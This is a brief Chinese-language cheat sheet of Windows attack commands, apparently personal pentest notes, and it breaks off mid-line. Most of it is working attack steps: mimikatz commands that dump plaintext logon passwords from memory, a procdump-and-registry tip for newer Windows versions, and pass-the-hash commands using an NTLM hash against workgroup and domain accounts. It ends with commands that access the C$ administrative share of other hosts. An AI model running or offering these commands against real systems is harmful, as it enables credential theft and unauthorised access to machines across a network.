前期:信息搜集
mimikatz获取明文密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords
在windows 2012以上系统 需要修改注册表搭配procdump+mimikatz 获取明文密码密码
哈希传递(pass the hash pth)
1.利用ntlm hash 进行哈希传递
连接工作组账户:
mimikatz # privilege::debug //提升权限
mimikatz #sekurlsa::pth /user:administrator /domain:workgroup /ntlm:23ae064d483cef543b50d07fc48756c7 //传递哈希
dir \\192.168.1.3\c$ //ip连接
dir \\WIN7-X64\c$ //计算机名连接
连接域账户:
mimikatz # privilege::debug //提升权限
mimikatz # sekurlsa::pth /user:tom /domain:HACKE /ntlm:23ae064d483cef543b50d07fc48756c7//传递哈希
c:\windows\system32> d